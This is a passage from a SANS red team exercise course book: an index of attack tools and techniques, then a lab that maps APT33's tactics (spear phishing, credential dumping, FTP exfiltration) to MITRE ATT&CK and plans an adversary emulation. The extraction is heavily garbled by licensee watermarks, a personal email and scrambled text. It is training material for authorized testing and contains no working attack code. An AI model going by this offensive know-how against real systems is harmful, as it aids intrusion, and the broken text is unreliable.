Lincoln Mazzei 1:111, 1:113 1:113 1:62, 1:65, 1:72-73, 1:75-76, 1:79 2:81, 2:84 2:33-34 2:33

ce

H

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

Hash Values Hashcat Heatmap hijacking Hong Kong Monetary Authority (HKMA) Host Artifacts HP WebInspect HTML Application (HTA)

1:51, 1:140 2:11, 2:85, 2:87 2:124 1:130, 2:40-42, 2:44-45, 2:60, 2:107 1:28, 1:34 1:51, 1:140 1:11 1:125, 1:134, 2:62-63

live

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 I IBM AppScan ifconfig Immunity Innuendo Indicators of Compromise (IoC) Inject

1:11 2:24 1:96 1:51, 1:62, 1:86, 1:140, 2:116 1:83, 1:131, 1:134, 1:137-140, 2:78, 2:89, 2:112 2:78, 2:103 1:29, 1:126 1:28, 1:34

Input Capture Installation intelligence-led Cyber Attack Simulation Testing (iCAST) IP Addresses

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 [email protected] Ap ril

1:13, 1:51, 1:90, 1:98-100, 1:109-111, 1:113, 1:140-141, 1:143 2:24, 2:30

m

>

ipconfig

John the Ripper Just In Time (JIT) Just-Metadata

2:87 2:75, 2:80 1:111

o.

co

J

ak

er

@ ya

ho

22829180 i< an

Kali Linux KeeFarce KeePass Keeper KeeThief Kerberoasting Key Intelligence Questions (KIQ) Key Intelligence Topics (KIT) Keychain Keying

nm

K

1:92 2:79 2:79 2:79 2:79 2:71, 2:81, 2:85 1:87 1:87 2:79 2:72

nc o

ln

M

az

ze

Lincoln Mazzei

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

L

Li

ce

LastPass Lateral Movement

2:79 1:7, 1:39-40, 1:56, 1:83, 1:95, 1:107, 1:137, 2:3, 2:16, 2:24, 2:76, 2:80, 2:91-92, 2:97, 2:103, 2:137 2:95-96

live

Link-Local Multicast Name Resolution (LLMNR) linkScrape Local Security Authority Subsystem Service (LSASS) Lockheed Martin Log evasion

1:111 1:138, 2:83, 2:89 1:28-29, 1:82 2:60

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 LOLBAS LOLBin

2:60-62, 2:65, 2:67 2:60, 2:62, 2:67

090aff33bcb6e401ded410120bc9a268 M

Maltego Massachusetts Institute of Technology (MIT) McAfee Metagoofil Metasploit Mimikatz MITRE

1:115-116 1:10

26 ,2 02 0

1:99 1:114 1:95, 1:101, 1:115, 1:139, 2:10, 2:89, 2:93 1:53, 2:71, 2:81, 2:83, 2:85 1:28, 1:38, 1:45, 1:53-57, 1:61, 1:81, 1:8788, 1:90-91, 1:98-100, 1:102-105, 1:109, 1:112, 1:118-119, 1:126-127, 1:143-145, 2:6-9, 2:11, 2:18, 2:20-23, 2:25-29, 2:31, 2:38-44, 2:46-48, 2:50-55, 2:59, 2:62-63, 2:65, 2:67-69, 2:72, 2:75-79, 2:82, 2:85-86, 2:89, 2:91, 2:94-95, 2:103-107, 2:129, 2:132-134, 2:137 2:129 1:139 2:62

o.

co

m

>

Ap ril

[email protected] @ ya

ho

22829180 nm

ak

er

MITRE Caldera Msfvenom mshta.exe

i< an

N

Lincoln Mazzei nc o

ln

M

az

ze

net command net session net start NetBIOS Name Service (NBT-NS) netstat Network Artifacts Network File System (NFS) Network Flight Simulator (flightsim) Network Propagation Network services test Nmap NotPetya NPK nslookup

2:21 2:24 2:22 2:95 2:24, 2:30 1:51, 1:140 2:105 2:129, 2:131 1:86, 2:2, 2:7, 2:16, 2:18, 2:23, 2:137 1:22 1:113-114, 2:30, 2:93 1:24 2:87-88 1:113

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

O Objective Met Organizational Unit (OU)

1:29 2:33, 2:36

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 P Palo Alto Pass the Hash passive recon Password Cracking Password Managers Paul Pols Pausing Penetration Testing

1:99 2:89 1:39, 1:107, 1:110 2:10, 2:81, 2:87-89 2:75, 2:79, 2:103 1:28, 1:39, 1:107 1:84 1:5, 1:9-10, 1:13-14, 1:22, 1:28, 1:30-31, 1:35-36, 1:69, 1:95, 2:8, 2:134 1:7, 1:40, 1:54, 1:56, 1:69, 1:101, 1:107, 1:137-138, 2:2, 2:16, 2:40-41, 2:50, 2:5255, 2:57, 2:60, 2:68, 2:137 1:15, 1:19, 1:21, 1:26, 1:36, 1:52-54, 1:56, 1:80, 1:89, 1:100, 1:109, 1:118-120, 1:134, 1:143, 2:5, 2:50, 2:91, 2:128 1:22 1:5, 1:13, 1:34-35, 1:52-54, 1:65, 1:88, 1:97, 1:110-111, 1:137, 1:148, 2:24-25, 2:36, 2:48, 2:52, 2:60, 2:81-85, 2:114, 2:137 1:7, 1:40, 1:107, 2:3, 2:16, 2:99, 2:137 2:95-96 1:130, 1:137 1:53-54, 1:95, 1:97, 1:125-139, 2:20, 2:25, 2:29-31, 2:33-36, 2:45, 2:62, 2:67-69, 2:7173, 2:79, 2:83-84, 2:86, 2:92, 2:105 1:53, 1:127, 1:130, 1:137, 2:31, 2:34-35, 2:45, 2:84, 2:97 1:130, 1:137, 2:45 1:130, 1:137, 2:30-31, 2:33-36 1:7, 1:39-40, 1:53, 1:56, 1:107, 1:137, 2:2, 2:7, 2:16, 2:38-41, 2:45-46, 2:48, 2:57, 2:71, 2:137 2:81 1:22 1:34

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 Persistence

Ap ril

[email protected] m

>

Phishing

o.

co

Physical security test ping

@ ya

ho

22829180 i< an

nm

ak

er

Pivoting Poisoning PowerBreach PowerShell

ze

Lincoln Mazzei

PowerSploit

nc o

ln

M

az

PowerUp PowerView Privilege Escalation

procdump Product security test Professional Development Program (PDP) Project Management Prudential Regulatory Authority (PRA) PsExec Purple Team

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK pwndb pwnedOrNot Pyramid of Pain

1:65, 1:72, 1:74-75, 1:78, 1:87, 1:107, 2:112 1:30 1:137, 2:89, 2:92-93 1:7, 1:9-10, 1:17, 1:69, 1:148, 2:91, 2:94-95, 2:111, 2:116, 2:119, 2:132, 2:137 1:112 1:112 1:51, 1:140

live

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Q Qualys

1:11

090aff33bcb6e401ded410120bc9a268 R

1:11 1:4, 1:22, 1:29, 1:39, 1:52, 1:72, 1:86, 1:92, 1:99, 1:107, 1:109-116, 1:118, 1:122, 1:130, 1:138, 1:140, 1:148, 2:6, 2:9, 2:12, 2:18, 2:30-31, 2:33-35, 2:92 1:115 1:115-116 1:4, 1:29, 1:39, 1:52, 1:72, 1:86, 1:107, 1:109-111, 1:113-115, 1:140, 1:148, 2:6, 2:9, 2:18 1:100 1:103 1:51, 1:138, 2:26, 2:40, 2:42, 2:54 1:54, 2:54 1:54, 2:61, 2:64-66 1:133, 1:143, 2:94-96 1:101, 1:138, 2:10, 2:22, 2:30, 2:83, 2:92 1:22 1:17, 1:33, 1:69, 1:75, 2:111, 2:116, 2:118 1:11-13, 1:15, 1:21, 1:26, 1:31, 1:33-34, 1:37, 1:41, 1:47, 1:54, 1:62, 1:66, 1:72-73, 1:78-79, 1:81, 1:83-84, 1:100, 1:109, 1:111, 1:116, 1:120, 1:127, 1:141, 1:148, 2:3, 2:33, 2:44, 2:69, 2:111-112, 2:121, 2:134, 2:137 1:80, 2:95-96 1:72, 1:74, 1:76 2:33-34 1:3, 1:7, 1:10, 1:13, 1:41, 1:61, 1:76, 1:7881, 1:118, 1:148, 2:103-104, 2:106, 2:116, 2:121, 2:137 1:54, 2:42, 2:54 1:54, 2:67-68

26 ,2 02 0

Rapid7 Nexpose Recon

Recon Frameworks Recon-ng Reconnaissance

co

o.

Red Flag Redirectors Registry Keys Registry Run Keys Regsvr32 Relay Remote Desktop Protocol (RDP) Remote dial-up war dial test Replay Report

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

Responder Risk Avoidance Rubeus Rules of Engagement (ROE)

az

ze

Lincoln Mazzei

ed

Li

S

ce

ns

Run Keys Rundll32

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK SafeBreach SafetyKatz sc schtasks Scope ScrapedIn

2:134 2:71 2:22, 2:42, 2:51-53, 2:89, 2:92-93 2:42, 2:53, 2:92 1:7, 1:10, 1:12-13, 1:16, 1:20, 1:22, 1:28, 1:31, 1:36, 1:41, 1:61, 1:65-69, 1:73, 1:76, 1:78, 1:125, 1:148, 2:24, 2:121, 2:137 1:111

live

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Screen Capture Scythe SearchDiggity Seatbelt Sector Cyber Team (SCT) Secure CoPy (SCP) Secure SHell (SSH) Sender Policy Framework (SPF) Server Message Block (SMB) Service Principal Names (SPNs) Service Principle Names (SPN) Shadow Copy SharpDump Sharphound SharpRoast SharpUp SharpWMI Shrink-wrapped software test side-loading skiptracer Slingshot SMB Relay Sniffing Social Engineering

2:103-104 2:129, 2:134 1:113 2:48, 2:71 1:30-31, 1:134, 2:66 2:105 1:101, 2:10, 2:22, 2:76, 2:92, 2:105 1:113, 1:143 1:101, 2:10, 2:33, 2:92-94, 2:96, 2:105 2:33, 2:81, 2:85 2:81, 2:85 2:81 2:71 2:36 2:71 2:71 2:71 1:22 2:60 1:111 1:92 2:94, 2:96 2:24-25, 2:75, 2:86 1:4, 1:15, 1:19, 1:21-22, 1:24, 1:26, 1:69, 1:86, 1:100, 1:103, 1:109, 1:112, 1:118-120, 1:122, 1:124, 1:148, 2:6, 2:44, 2:128 1:22 1:111 1:24-25 1:115-116 1:113 2:54 1:22 2:46-47, 2:66 1:99

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

[email protected]

Social engineering test Social Mapper Sony Spiderfoot Spoofcheck Startup Folder Stolen equipment test Sudo Symantec

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

T

Li

ce

Tactics, Techniques, and Procedures (TTPs) Target Defined Target Manipulation tasklist TCP/22 TCP/3389 TCP/5985-6 TeamViewer

1:7, 1:14, 1:16-17, 1:19, 1:22-23, 1:34, 1:38, 1:41, 1:45-46, 1:51-57, 1:66, 1:72, 1:83, 1:86, 1:89, 1:140, 2:75, 2:101, 2:111, 2:118-119, 2:121, 2:123, 2:129 1:29 1:39-40, 1:107, 2:3 2:22 2:92 2:92 2:92 2:92

live

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Tenable Nessus theHarvester: Threat

1:11 1:110, 1:116 1:1, 1:3, 1:6-7, 1:11-12, 1:16, 1:22, 1:28, 1:30-36, 1:38, 1:41, 1:43-49, 1:51, 1:53-57, 1:59, 1:62, 1:65-66, 1:68-69, 1:72-75, 1:78, 1:83, 1:86-87, 1:89, 1:92, 1:99, 1:107, 1:109-110, 1:112, 1:140, 1:148, 2:7, 2:18, 2:23, 2:31, 2:60, 2:69, 2:111, 2:114, 2:116, 2:121, 2:127, 2:134, 2:137 1:28, 1:32

Threat Intelligence-Based Ethical Red Teaming (TIBER-EU) Threat-Led Penetration Testing (TLPT) Time Estimations Triggers

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 1:28, 1:35 1:75 1:7, 1:41, 1:61-62, 1:69, 1:148, 2:55, 2:112, 2:137 2:105 1:111 1:7, 1:41, 1:61, 1:71-74, 1:76, 1:78-81, 1:83-84, 1:148, 2:111-112, 2:114, 2:118, 2:127, 2:137

o.

co

m

>

Trivial File Transfer Protocol (TFTP) truffleHog Trusted Agents

Ap ril

[email protected] @ ya

ho

22829180 ak

er

U

2:76-77 1:139 1:28 2:43-44, 2:60

i< an

nm

Unattended Install Unicorn Unified Cyber Kill Chain User Account Control (UAC)

az

ze

Lincoln Mazzei M

V

nc o

ln

VECTR Verodin Virtual Network Computing (VNC) Visual Basic for Applications (VBA) VSSAdmin Vulnerability Assessment

1:1, 1:141, 2:115, 2:117, 2:122-125 2:134 2:10, 2:92 1:125, 1:127, 1:129 2:81 1:7, 1:9, 1:11-13, 1:20, 1:69, 1:148, 2:134, 2:137 1:9-12, 1:69, 1:113

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK W

Li

ce

ns

Vulnerability Scanning

WannaCry Weaponization Web application test WebPulse White Cell White Team

live

1:24-25 1:4, 1:29, 1:39, 1:86, 1:107, 1:124, 1:132, 1:134, 1:139, 1:147-148, 2:34, 2:137 1:22 1:99 1:71, 1:105 1:7, 1:32, 1:71, 1:148, 2:137

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020 Whitelisting whoami Windows Management Instrumentation (WMI) Windows Script Host (WSH) WinRM Wireless security test WMI Persistence WMIC WMIOps

2:23, 2:30, 2:59-60, 2:64 2:21, 2:30 2:26, 2:29-30, 2:35, 2:55, 2:71

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

[email protected] 1:99

o.

co

m

>

xForce

Ap ril

X

1:125, 1:128, 2:65 2:92, 2:97 1:22 2:55 2:26-28, 2:40, 2:92 2:29

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

SEC564 | RED TEAM EXERCISES AND ADVERSARY EMULATION

090aff33bcb6e401ded410120bc9a268

o.

co

m

>

Ap ril

26 ,2 02 0

Workbook [email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live THE MOST TRUSTED SOURCE FOR INFORMATION SECURITY TRAINING, CERTIFICATION, AND RESEARCH | sans.org

Licensed To: Lincoln Mazzei April 26, 2020

© SANS Institute 2020

&RS\ULJKW‹20Jorge Orchilles.$OOULJKWVUHVHUYHGWRJorge OrchillesDQGRU6$16,QVWLWXWH

3/($6(5($'7+(7(506$1'&21',7,2162)7+,6&2856(:$5(/,&(16($*5((0(17 &/$ &$5()8//

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live SEC564 - © 2019 Jorge Orchilles

Lab 1.1: Consuming Threat Intelligence

 

Licensed To: Lincoln Mazzei April 26, 2020

1.1-9

© SANS Institute 2020

Category  Description 

 Description 

 

Goal and Intent 

090aff33bcb6e401ded410120bc9a268  

[email protected] m

 

o.

co

Persistence 

>

Ap ril

Execution 

26 ,2 02 0

 

Initial Access 

ho

22829180

 

Lincoln Mazzei

Discovery 

 

nc o

ln

M

az

Credential Access 

i< an

 

ze

Defense Evasion 

nm

ak

er

@ ya

 

Privilege Escalation 

ns

 

Li

ce

Lateral Movement 

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Command and Control 

 

Exfiltration 

 

live

  SEC564 - © 2019 Jorge Orchilles

Lab 1.1: Consuming Threat Intelligence

 

Licensed To: Lincoln Mazzei April 26, 2020

1.1-10

© SANS Institute 2020

Use MITRE ATT&CKTM Navigator to filter TTPs for selected adversary 

MITRE has developed the ATT&CKTM Navigator, a web application that represents the MITRE ATT&CKTM  techniques in a dynamic fashion. It can be used to select specific techniques based on a threat group (e.g.  select all APT‐33 techniques), after which modifications and annotations can be made. It may have TTPs  assigned to an adversary that was not provided in the Threat Intelligence. Note that the techniques for  Groups/Software in Navigator are fully referenced to open sources on MITRE ATT&CKTM Groups and Software  pages. Navigator is open‐source and can be self‐hosted! 

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

10. Review the APT33 group page on MITRE ATT&CKTM page: https://attack.mitre.org/groups/G0064/     11. Navigate to the hosted site MITRE ATT&CKTM Navigator instance:  https://mitre‐attack.github.io/attack‐navigator/enterprise/     12. Click the third icon from left to right under “selection controls”.    13. Click “select” next to APT33. 

o.

co

m

>

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

 

live

14. Click the third icon from left to right under “selection controls” again to make it go away.    The TTPs tagged to APT33 will now have a black border around it.    15. Select the second icon from left to right under “technique controls” and click a color.    SEC564 - © 2019 Jorge Orchilles

Lab 1.1: Consuming Threat Intelligence

 

Licensed To: Lincoln Mazzei April 26, 2020

1.1-11

© SANS Institute 2020

The TTPs for APT33 will now change colors. 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

>

Ap ril

[email protected] co

m

 

o.

16. Select the second icon from left to right under “technique controls” again to make it go away.    17. Click the “layer” text on the top left to edit and change to APT33: 

i< an

nm

ak

er

@ ya

ho

22829180  

  18. Click the second, third, or forth icon from left to right under “layer controls” to export in JSON, Excel,  or SVG respectively.  

nc o

ln

M

az

ze

Lincoln Mazzei

 

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK ns

ed

To :

19. Continue to toggle various controls to see what they do. Pay particular attention to the “technique  controls” where a score and comments can be added for each TTP that is selected. This may be helpful  for reporting improvements as Red Team performs more and more exercises. 

Li

ce

The next page has an abbreviated example of what the MITRA ATT&CKTM Navigator matrix may look  like for APT33. 

live

For more on creating layers with MITRA ATT&CKTM Navigator, visit:  https://attack.mitre.org/docs/Comparing_Layers_in_Navigator.pdf      

 

SEC564 - © 2019 Jorge Orchilles

Lab 1.1: Consuming Threat Intelligence

 

Licensed To: Lincoln Mazzei April 26, 2020

1.1-12

InstallUtil 

Mshta 

Spear phishing Link  Spear phishing via  Service  Supply Chain  Compromise  Trusted  Relationship 

Valid Accounts 

 

Hooking 

Hypervisor  Image File  Execution Options  Injection  LC_LOAD_DYLIB  Addition 

Scheduled Task 

Scripting 

SEC564 - © 2019 Jorge Orchilles

User Execution 

Third‐party Software 

Service Execution 

 

Scheduled Task 

 

 

Securityd Memory  Two‐Factor  Authentication  Interception 

Private Keys 

 

 

 

NTFS File Attributes  Obfuscated Files or  Information 

 

 

Mshta 

Image File Execution Options Injection 

Hidden Users 

File Permissions Modification 

File Deletion 

Extra Window Memory Injection 

Exploitation for  Defense Evasion 

Execution Guardrails 

DLL Side‐Loading 

ho

co

 

>

 

Virtualization/Sandbox Evasion 

System Time  Discovery 

System Service Discovery 

m

System Owner/User Discovery 

o.

 

Man in the  Browser 

1.1-13

Ap ril

 

26 ,2 02 0

 

 

 

Windows Remote Management 

Replication Through  Removable Media  Third‐party  Software  Windows Admin  Shares 

Input Capture 

Email Collection 

Remote File Copy  Remote Services 

Data Staged 

 

 

 

 

 

 

Scheduled Transfer 

Data Transfer Size Limits  Exfiltration Over  Alternative Protocol  Exfiltration Over  Command and Control  Channel  Exfiltration Over Other  Network Medium  Exfiltration Over Physical  Medium 

Data Encrypted 

Data Compressed 

Automated Exfiltration 

Exfiltration 

Web Service 

Uncommonly Used  Port 

 

 

Standard Non‐Application Layer Protocol 

Standard Application  Layer Protocol  Standard  Cryptographic  Protocol 

Remote File Copy 

Remote Access Tools 

Port Knocking 

Multi‐hop Proxy 

Fallback Channels 

Domain Fronting  Domain Generation  Algorithms 

Data Obfuscation 

Data Encoding 

Custom Command  and Control Protocol  Custom Cryptographic  Protocol 

Connection Proxy 

Clipboard Data  Data from  Information  Repositories  Data from Local  System  Data from  Network Shared  Drive  Data from  Removable Media 

Automated  Collection 

Commonly Used Port  Communication  Through Removable  Media 

Command And  Control 

090aff33bcb6e401ded410120bc9a268 Audio Capture 

Collection 

Pass the Ticket  Remote Desktop  Protocol 

Pass the Hash 

Logon Scripts 

Exploitation of  Remote Services 

AppleScript  Application  Deployment  Software  Distributed  Component Object  Model 

Lateral  Movement 

System Network Connections Discovery 

@ ya

Permission Groups  Discovery  Security Software  Discovery  System Information  Discovery  System Network  Configuration  Discovery 

Network Sniffing  Password Policy  Discovery  Peripheral Device  Discovery 

Network Service  Scanning  Network Share  Discovery 

er

ak

Password Filter DLL 

nm

Network Sniffing 

Input Prompt 

i< an

ze

Component Object  Model Hijacking  Disabling Security  Tools  DLL Search Order  Hijacking 

Input Capture 

Lab 1.1: Consuming Threat Intelligence

 

 

Logon Scripts  Re‐opened  Applications  Registry Run Keys /  Startup Folder 

Valid Accounts 

Setuid and Setgid 

Scheduled Task  Service Registry  Permissions  Weakness 

Process Injection 

Hidden Files and  Directories 

Rundll32 

Regsvr32 

Regsvcs/Regasm 

Plist Modification 

Path Interception 

Port Monitors 

Dylib Hijacking 

New Service 

az

M

Hooking 

Credentials in  Registry  Exploitation for  Credential Access  Forced  Authentication 

Credentials in Files 

Lincoln Mazzei

Compiled HTML File  Component  Firmware 

ln

Browser Bookmark  Discovery 

Brute Force  Domain Trust  Discovery  File and Directory  Discovery 

Application Window  Discovery 

Bash History 

Credential Dumping 

Account Discovery 

Account  Manipulation 

Discovery 

[email protected]

 

Change Default File  Association  DLL Search Order  Hijacking 

Browser Extensions 

Bootkit 

Code Signing  Compile After  Delivery 

CMSTP 

Bypass User Account  Control  Clear Command  History 

nc o

Li

Dylib Hijacking  Exploitation for  Privilege Escalation  Extra Window  Memory Injection  File System  Permissions  Weakness 

To :

BITS Jobs 

ed

Bypass User  Account Control  DLL Search Order  Hijacking 

Application  Shimming  Authentication  Package 

live

External Remote  Services  File System  Permissions  Weakness 

PowerShell 

Dynamic Data  Exchange  Execution through  API  Execution through  Module Load  Exploitation for  Client Execution  Graphical User  Interface 

Licensed To: Lincoln Mazzei April 26, 2020

Spearphishing  Attachment 

ns

ce

AppInit DLLs  Application  Shimming 

BITS Jobs 

Binary Padding 

Access Token  Manipulation 

Credential  Defense Evasion  Access 

22829180

 

AppInit DLLs 

Control Panel Items 

Li

AppCert DLLs 

Compiled HTML File 

Hardware Additions  Replication Through  Removable Media 

AppCert DLLs 

Account  Manipulation 

Command‐Line  Interface 

External Remote  Services 

Accessibility  Features 

CMSTP 

Exploit Public‐ Facing Application 

Accessibility  Features 

AppleScript 

Access Token  Manipulation 

.bash_profile and  .bashrc 

Drive‐by  Compromise 

Privilege  Escalation 

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK

Persistence 

Execution 

Initial Access 

© SANS Institute 2020

© SANS Institute 2020

Analyze and Organize the threat intelligence into a technical flow 

MITE ATT&CKTM Navigator does a great job visualizing TTPs for a known adversary that is part of the  framework, but it does not analyze and organize the threat intelligence into a technical flow that the Red  Team will be able to follow. It is time to create the Adversary Emulation Scenario. Scenarios are a core aspect  of Red Team Exercises that distinguishes them from other types of security assessments. Start by organizing  the intelligence into a technical flow.    20. Go back to page 10 of this lab and number the “Category” into high level phases or tactics that Red  Team should follow. Don’t worry if this is not exactly how the Red Team Exercise goes; this is just a  plan and not set in stone.    21. Look at the next page for an example solution. There is no “right” or “wrong”. Red Team can be flexible  as long as the adversary is being emulated and the goals and objectives attempted.   

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268

>

 

o.

co

m

 

Ap ril

[email protected]

i< an

nm

ak

er

@ ya

ho

22829180

nc o

ln

M

az

ze

Lincoln Mazzei

Li

ce

ns

ed

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live SEC564 - © 2019 Jorge Orchilles

Lab 1.1: Consuming Threat Intelligence

 

Licensed To: Lincoln Mazzei April 26, 2020

1.1-14

© SANS Institute 2020

Category  Description 

0 Goal and Intent 

Description  APT33 is a suspected Iranian threat group that has carried out operations since at  least 2013. The group has targeted organizations in the United States, Saudi Arabia,    and South Korea, in multiple industries including governments, research, chemical,  engineering, manufacturing, consulting, finance, telecoms, and several other sectors.  Establishing persistent access to partner and suppliers of targets.  Mounting supply chain attacks    T1192 – Spear phishing Link: Send spear phishing emails containing links to .hta   T1110 ‐ Brute Force: Password spraying to gain access to target systems    T1078 ‐ Valid Accounts: Used to access mailbox via Outlook Web Access     T1204 ‐ User Execution: Malicious HTML applications delivered via spear phishing  emails    T1203 ‐ Exploitation for Client Execution: Exploit WinRAR (CVE‐2018‐20250)     T1060 ‐ Registry Run Keys / Startup Folder: Added DarkComet to the Startup folder   T1053 ‐ Scheduled Task: Created a scheduled task to execute a .vbe file    

Initial Access 

3 Execution 

26 ,2 02 0

090aff33bcb6e401ded410120bc9a268 0

Ap ril

[email protected] 4 co

o.

5

m

>

Persistence 

Privilege Escalation  T1068 ‐ Exploitation for Privilege Escalation: Exploit CVE‐2017‐0213 

ho

22829180 @ ya

6  Defense Evasion 

ak

er

T1132 ‐ Data Encoding: Base64 to encode command and control traffic  T1480 ‐ Execution Guardrails: Kill dates in payload to guardrail execution    T1027 ‐ Obfuscated Files or Information: Base64 to encode payloads  T1086 – PowerShell: To download files from the C2 server and run various scripts    Credential Access   T1003 ‐ Credential Dumping: Publicly available tools like LaZagne, Mimikatz,  Gpppassword, SniffPass, and ProcDump to dump credentials   

i< an

nm

2

ze

Lincoln Mazzei M

az

8

T1040 ‐ Network Sniffing: SniffPass to collect credentials by sniffing network traffic 

ln

Discovery 

nc o



Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK 9 T1078 ‐ Valid Accounts: Used valid accounts to move laterally  T1105 ‐ Remote File Copy: Downloaded additional files and programs from its C2    server    Set up attack infrastructure  T1043 ‐ Commonly Used Port: Port 80 and 443   T1071 ‐ Standard Application Layer Protocol: HTTP and HTTPS    T1032 ‐ Standard Cryptographic Protocol: AES for encryption  T1065 ‐ Uncommonly Used Port: Ports 808 and 880    T1002 ‐ Data Compresse: WinRAR to compress data prior to exfiltration  T1048 ‐ Exfiltration Over Alternative Protocol: FTP to exfiltrate files   

ce

Li

Command and  Control 

ns

ed

To :

Lateral Movement 

1 Exfiltration 

10

live

SEC564 - © 2019 Jorge Orchilles

Lab 1.1: Consuming Threat Intelligence

 

Licensed To: Lincoln Mazzei April 26, 2020

1.1-15

© SANS Institute 2020

Create an Adversary Emulation Plan 

Tactics and Techniques have been identified, analyzed, and organized in the chart above. The final preparation  part for the Red Team is to create the Adversary Emulation Plan. As that portion has not been covered in the  course thus far (but will be), we will review the plans for APT3 as provided by MITRE.  22. Navigate to ThreatIntel\APT3\ folder on the course USB.    23. Open and Review the Adversary Emulation Plans ‐ MITRE ATT&CK.pdf 

090aff33bcb6e401ded410120bc9a268 24. Open and Review the APT3_Adversary_Emulation_Field_Manual.xlsx    25. Open and Review the APT3_Adversary_Emulation_Plan.pdf 

[email protected] Ap ril

 

26 ,2 02 0

 

>

Bonus 

o.

co

m

If you have time and are familiar with the procedures of some of the techniques identified, start documenting  exactly how they should be executed in the exercise. A spreadsheet should be complex enough. Lab 2.5 will  cover documenting an Adversary Emulation plan in VECTR. 

@ ya

ho

22829180 er

Conclusion 

i< an

nm

ak

This lab followed the methodology of Threat Intelligence for Red Team Exercises to understand the target  organization; identify an adversary; gather threat intelligence for that adversary; read different sources of  threat intelligence for that adversary; Identify and Extract Tactics, Techniques, and Procedures (TTPs) used by  the adversary; Create an Adversary Profile; Use MITRE ATT&CKTM Navigator to filter TTPs for selected  adversary and fill in the gaps; Analyze and Organize the threat intelligence into a technical flow; and read an  example of an Adversary Emulation Plan. 

M

az

ze

Lincoln Mazzei nc o

ln

This is a good introduction and example of what a Threat Intelligence Analyst, Project Manager, Trusted  Agents, and Red Team members will receive during the Threat Intelligence phase of an Adversary Emulation  Red Team Exercise. For a good reference for Threat Intelligence based on MITRE ATT&CKTM,  read this blog  post: https://medium.com/mitre‐attack/getting‐started‐with‐attack‐cti‐4eb205be4b2f  

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK Li

ce

ns

ed

The work done in this lab will be used for the class‐long Adversary Emulation Red Team Exercise. 

live SEC564 - © 2019 Jorge Orchilles

Lab 1.1: Consuming Threat Intelligence

 

Licensed To: Lincoln Mazzei April 26, 2020

1.1-16

© SANS Institute 2020 Lab 1.2: Attack Infrastructure

Objectives 

090aff33bcb6e401ded410120bc9a268   

Configure the SEC564 Slingshot Linux virtual machine for the lab environment  Configure the SEC564 Windows virtual machine for the lab environment  Read and understand the Scope and Rules of Engagement 

26 ,2 02 0

  This lab will focus on the Planning Phase of a Red Team Adversary Emulation Exercise covering Attack  Infrastructure, Scope, and Rules of Engagement.    

o.

co

m

>

Ap ril

[email protected]

 

i< an

nm

ak

er

@ ya

ho

Threat  Closure 22829180 Intelligence

nc o

ln

M

az

ze

Testing Planning Lincoln Mazzei

ed ns

 

Li

ce

   

To :

Li

ohNrhAfzA3YUEB7zYQeMv7asRrrC6mmK live

SEC564 - © 2019 Jorge Orchilles

Lab 1.2: Attack Infrastructure

Licensed To: Lincoln Mazzei April 26, 2020

1.2-1

© SANS Institute 2020

Lab – Step‐by‐Step Instructions 

Virtual Machine Configuration

The Slingshot Linux Virtual Machine (VM) and the Windows VM will be used during this class; getting them  networked is important.  

090aff33bcb6e401ded410120bc9a268 26 ,2 02 0

1. Start by unzipping the Slingshot Linux VM and the Windows VM from the USB onto your hard drive. Unzip  all the files included in the large ZIP images on the course USB.     2. After the files are unzipped, run VMware, select Open a Virtual Machine, and choose the folder where you  extracted Slingshot to. Then do the same thing for the Windows VM.    3. Ensure both virtual machines are bridged to your proper network interface (for in‐classroom SANS  training, that should be your wireless adapter).  By default, VMware bridges to an automatically selected  adapter, but we may need to select our Wireless interface. 

co

m

>

Ap ril

[email protected] o.

